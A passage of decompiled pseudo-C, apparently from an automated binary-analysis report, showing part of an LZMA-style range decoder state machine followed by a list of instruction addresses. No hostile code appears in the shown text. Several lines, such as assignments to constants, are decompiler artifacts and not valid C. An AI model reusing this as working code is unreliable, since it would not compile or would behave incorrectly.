                                                  								goto L69;
                                                  							}
                                                  							__eax =  *(__ebp - 4);
                                                  							__ecx =  *(__ebp - 0x38);
                                                  							 *(__ebp - 0x84) = 8;
                                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  							goto L132;
                                                  						case 8:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x84) = 0xa;
                                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x38);
                                                  								__ecx =  *(__ebp - 4);
                                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                                  								 *(__ebp - 0x84) = 9;
                                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  							}
                                                  							goto L132;
                                                  						case 9:
                                                  							goto L0;
                                                  						case 0xa:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x84) = 0xb;
                                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x28);
                                                  							goto L88;
                                                  						case 0xb:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__ecx =  *(__ebp - 0x24);
                                                  								__eax =  *(__ebp - 0x20);
                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x24);
                                                  							}
                                                  							__ecx =  *(__ebp - 0x28);
                                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  							L88:
                                                  							__ecx =  *(__ebp - 0x2c);
                                                  							 *(__ebp - 0x2c) = __eax;
                                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  							goto L89;
                                                  						case 0xc:
                                                  							L99:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xc;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t334 = __ebp - 0x70;
                                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t334;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							__eax =  *(__ebp - 0x2c);
                                                  							goto L101;
                                                  						case 0xd:
                                                  							L37:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xd;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t122 = __ebp - 0x70;
                                                  							 *_t122 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t122;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							L39:
                                                  							__eax =  *(__ebp - 0x40);
                                                  							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  								goto L48;
                                                  							}
                                                  							__eflags = __ebx - 0x100;
                                                  							if(__ebx >= 0x100) {
                                                  								goto L54;
                                                  							}
                                                  							L41:
                                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  							 *(__ebp - 0x48) = __eax;
                                                  							__eax = __eax + 1;
                                                  							__eax = __eax << 8;
                                                  							__eax = __eax + __ebx;
                                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  							__ax =  *__esi;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__edx = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								 *(__ebp - 0x40) = 1;
                                                  								__cx = __ax >> 5;
                                                  								__eflags = __eax;
                                                  								__ebx = __ebx + __ebx + 1;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edx;
                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								goto L39;
                                                  							} else {
                                                  								goto L37;
                                                  							}
                                                  						case 0xe:
                                                  							L46:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xe;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t156 = __ebp - 0x70;
                                                  							 *_t156 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t156;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							while(1) {
                                                  								L48:
                                                  								__eflags = __ebx - 0x100;
                                                  								if(__ebx >= 0x100) {
                                                  									break;
                                                  								}
                                                  								__eax =  *(__ebp - 0x58);
                                                  								__edx = __ebx + __ebx;
                                                  								__ecx =  *(__ebp - 0x10);
                                                  								__esi = __edx + __eax;
                                                  								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  								__ax =  *__esi;
                                                  								 *(__ebp - 0x54) = __esi;
                                                  								__edi = __ax & 0x0000ffff;
                                                  								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  								__eflags =  *(__ebp - 0xc) - __ecx;
                                                  								if( *(__ebp - 0xc) >= __ecx) {
                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  									__cx = __ax;
                                                  									_t170 = __edx + 1; // 0x1
                                                  									__ebx = _t170;
                                                  									__cx = __ax >> 5;
                                                  									__eflags = __eax;
                                                  									 *__esi = __ax;
                                                  								} else {
                                                  									 *(__ebp - 0x10) = __ecx;
                                                  									0x800 = 0x800 - __edi;
                                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  									__ebx = __ebx + __ebx;
                                                  									 *__esi = __cx;
                                                  								}
                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                  									continue;
                                                  								} else {
                                                  									goto L46;
                                                  								}
                                                  							}
                                                  							L54:
                                                  							_t173 = __ebp - 0x34;
                                                  							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  							__eflags =  *_t173;
                                                  							goto L55;
                                                  						case 0xf:
                                                  							L58:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xf;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t203 = __ebp - 0x70;
                                                  							 *_t203 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t203;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							L60:
                                                  							__eflags = __ebx - 0x100;
                                                  							if(__ebx >= 0x100) {
                                                  								L55:
                                                  								__al =  *(__ebp - 0x44);
                                                  								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  								goto L56;
                                                  							}
                                                  							L61:
                                                  							__eax =  *(__ebp - 0x58);
                                                  							__edx = __ebx + __ebx;
                                                  							__ecx =  *(__ebp - 0x10);
                                                  							__esi = __edx + __eax;
                                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  							__ax =  *__esi;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								_t217 = __edx + 1; // 0x1
                                                  								__ebx = _t217;
                                                  								__cx = __ax >> 5;
                                                  								__eflags = __eax;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								goto L60;
                                                  							} else {
                                                  								goto L58;
                                                  							}
                                                  						case 0x10:
                                                  							L109:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0x10;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t365 = __ebp - 0x70;
                                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t365;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							goto L111;
                                                  						case 0x11:
                                                  							goto L69;
                                                  						case 0x12:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 0x58);
                                                  								 *(__ebp - 0x84) = 0x13;
                                                  								__esi =  *(__ebp - 0x58) + 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x4c);
                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                  							__eflags = __eax;
                                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  							goto L130;
                                                  						case 0x13:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								_t469 = __ebp - 0x58;
                                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  								__eflags =  *_t469;
                                                  								 *(__ebp - 0x30) = 0x10;
                                                  								 *(__ebp - 0x40) = 8;
                                                  								L144:
                                                  								 *(__ebp - 0x7c) = 0x14;
                                                  								goto L145;
                                                  							}
                                                  							__eax =  *(__ebp - 0x4c);
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                  							 *(__ebp - 0x30) = 8;
                                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  							L130:
                                                  							 *(__ebp - 0x58) = __eax;
                                                  							 *(__ebp - 0x40) = 3;
                                                  							goto L144;
                                                  						case 0x14:
                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  							__eax =  *(__ebp - 0x80);
                                                  							goto L140;
                                                  						case 0x15:
                                                  							__eax = 0;
                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  							__al = __al & 0x000000fd;
                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  							goto L120;
                                                  						case 0x16:
                                                  							__eax =  *(__ebp - 0x30);
                                                  							__eflags = __eax - 4;
                                                  							if(__eax >= 4) {
                                                  								_push(3);
                                                  								_pop(__eax);
                                                  							}
                                                  							__ecx =  *(__ebp - 4);
                                                  							 *(__ebp - 0x40) = 6;
                                                  							__eax = __eax << 7;
                                                  							 *(__ebp - 0x7c) = 0x19;
                                                  							 *(__ebp - 0x58) = __eax;
                                                  							goto L145;
                                                  						case 0x17:
                                                  							L145:
                                                  							__eax =  *(__ebp - 0x40);
                                                  							 *(__ebp - 0x50) = 1;
                                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  							goto L149;
                                                  						case 0x18:
                                                  							L146:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0x18;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t484 = __ebp - 0x70;
                                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t484;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							L148:
                                                  							_t487 = __ebp - 0x48;
                                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                                  							__eflags =  *_t487;
                                                  							L149:
                                                  							__eflags =  *(__ebp - 0x48);
                                                  							if( *(__ebp - 0x48) <= 0) {
                                                  								__ecx =  *(__ebp - 0x40);
                                                  								__ebx =  *(__ebp - 0x50);
                                                  								0 = 1;
                                                  								__eax = 1 << __cl;
                                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  								__eax =  *(__ebp - 0x7c);
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								goto L140;
                                                  							}
                                                  							__eax =  *(__ebp - 0x50);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  							__eax =  *(__ebp - 0x58);
                                                  							__esi = __edx + __eax;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__ax =  *__esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								__cx = __ax >> 5;
                                                  								__eax = __eax - __ecx;
                                                  								__edx = __edx + 1;
                                                  								__eflags = __edx;
                                                  								 *__esi = __ax;
                                                  								 *(__ebp - 0x50) = __edx;
                                                  							} else {
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								goto L148;
                                                  							} else {
                                                  								goto L146;
                                                  							}
                                                  						case 0x19:
                                                  							__eflags = __ebx - 4;
                                                  							if(__ebx < 4) {
                                                  								 *(__ebp - 0x2c) = __ebx;
                                                  								L119:
                                                  								_t393 = __ebp - 0x2c;
                                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  								__eflags =  *_t393;
                                                  								L120:
                                                  								__eax =  *(__ebp - 0x2c);
                                                  								__eflags = __eax;
                                                  								if(__eax == 0) {
                                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  									goto L170;
                                                  								}
                                                  								__eflags = __eax -  *(__ebp - 0x60);
                                                  								if(__eax >  *(__ebp - 0x60)) {
                                                  									goto L171;
                                                  								}
                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  								__eax =  *(__ebp - 0x30);
                                                  								_t400 = __ebp - 0x60;
                                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  								__eflags =  *_t400;
                                                  								goto L123;
                                                  							}
                                                  							__ecx = __ebx;
                                                  							__eax = __ebx;
                                                  							__ecx = __ebx >> 1;
                                                  							__eax = __ebx & 0x00000001;
                                                  							__ecx = (__ebx >> 1) - 1;
                                                  							__al = __al | 0x00000002;
                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                  							__eflags = __ebx - 0xe;
                                                  							 *(__ebp - 0x2c) = __eax;
                                                  							if(__ebx >= 0xe) {
                                                  								__ebx = 0;
                                                  								 *(__ebp - 0x48) = __ecx;
                                                  								L102:
                                                  								__eflags =  *(__ebp - 0x48);
                                                  								if( *(__ebp - 0x48) <= 0) {
                                                  									__eax = __eax + __ebx;
                                                  									 *(__ebp - 0x40) = 4;
                                                  									 *(__ebp - 0x2c) = __eax;
                                                  									__eax =  *(__ebp - 4);
                                                  									__eax =  *(__ebp - 4) + 0x644;
                                                  									__eflags = __eax;
                                                  									L108:
                                                  									__ebx = 0;
                                                  									 *(__ebp - 0x58) = __eax;
                                                  									 *(__ebp - 0x50) = 1;
                                                  									 *(__ebp - 0x44) = 0;
                                                  									 *(__ebp - 0x48) = 0;
                                                  									L112:
                                                  									__eax =  *(__ebp - 0x40);
                                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  										_t391 = __ebp - 0x2c;
                                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  										__eflags =  *_t391;
                                                  										goto L119;
                                                  									}
                                                  									__eax =  *(__ebp - 0x50);
                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  									__eax =  *(__ebp - 0x58);
                                                  									__esi = __edi + __eax;
                                                  									 *(__ebp - 0x54) = __esi;
                                                  									__ax =  *__esi;
                                                  									__ecx = __ax & 0x0000ffff;
                                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                                  									if( *(__ebp - 0xc) >= __edx) {
                                                  										__ecx = 0;
                                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  										__ecx = 1;
                                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  										__ebx = 1;
                                                  										__ecx =  *(__ebp - 0x48);
                                                  										__ebx = 1 << __cl;
                                                  										__ecx = 1 << __cl;
                                                  										__ebx =  *(__ebp - 0x44);
                                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                                  										__cx = __ax;
                                                  										__cx = __ax >> 5;
                                                  										__eax = __eax - __ecx;
                                                  										__edi = __edi + 1;
                                                  										__eflags = __edi;
                                                  										 *(__ebp - 0x44) = __ebx;
                                                  										 *__esi = __ax;
                                                  										 *(__ebp - 0x50) = __edi;
                                                  									} else {
                                                  										 *(__ebp - 0x10) = __edx;
                                                  										0x800 = 0x800 - __ecx;
                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  										 *__esi = __dx;
                                                  									}
                                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                                  										L111:
                                                  										_t368 = __ebp - 0x48;
                                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                                  										__eflags =  *_t368;
                                                  										goto L112;
                                                  									} else {
                                                  										goto L109;
                                                  									}
                                                  								}
                                                  								__ecx =  *(__ebp - 0xc);
                                                  								__ebx = __ebx + __ebx;
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  									__ecx =  *(__ebp - 0x10);
                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  									__ebx = __ebx | 0x00000001;
                                                  									__eflags = __ebx;
                                                  									 *(__ebp - 0x44) = __ebx;
                                                  								}
                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                  									L101:
                                                  									_t338 = __ebp - 0x48;
                                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                                  									__eflags =  *_t338;
                                                  									goto L102;
                                                  								} else {
                                                  									goto L99;
                                                  								}
                                                  							}
                                                  							__edx =  *(__ebp - 4);
                                                  							__eax = __eax - __ebx;
                                                  							 *(__ebp - 0x40) = __ecx;
                                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  							goto L108;
                                                  						case 0x1a:
                                                  							L56:
                                                  							__eflags =  *(__ebp - 0x64);
                                                  							if( *(__ebp - 0x64) == 0) {
                                                  								 *(__ebp - 0x88) = 0x1a;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x68);
                                                  							__al =  *(__ebp - 0x5c);
                                                  							__edx =  *(__ebp - 8);
                                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  							 *( *(__ebp - 0x68)) = __al;
                                                  							__ecx =  *(__ebp - 0x14);
                                                  							 *(__ecx +  *(__ebp - 8)) = __al;
                                                  							__eax = __ecx + 1;
                                                  							__edx = 0;
                                                  							_t192 = __eax %  *(__ebp - 0x74);
                                                  							__eax = __eax /  *(__ebp - 0x74);
                                                  							__edx = _t192;
                                                  							goto L79;
                                                  						case 0x1b:
                                                  							goto L75;
                                                  						case 0x1c:
                                                  							while(1) {
                                                  								L123:
                                                  								__eflags =  *(__ebp - 0x64);
                                                  								if( *(__ebp - 0x64) == 0) {
                                                  									break;
                                                  								}
                                                  								__eax =  *(__ebp - 0x14);
                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                  									__eflags = __eax;
                                                  								}
                                                  								__edx =  *(__ebp - 8);
                                                  								__cl =  *(__eax + __edx);
                                                  								__eax =  *(__ebp - 0x14);
                                                  								 *(__ebp - 0x5c) = __cl;
                                                  								 *(__eax + __edx) = __cl;
                                                  								__eax = __eax + 1;
                                                  								__edx = 0;
                                                  								_t414 = __eax %  *(__ebp - 0x74);
                                                  								__eax = __eax /  *(__ebp - 0x74);
                                                  								__edx = _t414;
                                                  								__eax =  *(__ebp - 0x68);
                                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  								__eflags =  *(__ebp - 0x30);
                                                  								 *( *(__ebp - 0x68)) = __cl;
                                                  								 *(__ebp - 0x14) = _t414;
                                                  								if( *(__ebp - 0x30) > 0) {
                                                  									continue;
                                                  								} else {
                                                  									goto L80;
                                                  								}
                                                  							}
                                                  							 *(__ebp - 0x88) = 0x1c;
                                                  							goto L170;
                                                  					}
                                                  				}
                                                  			}













                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
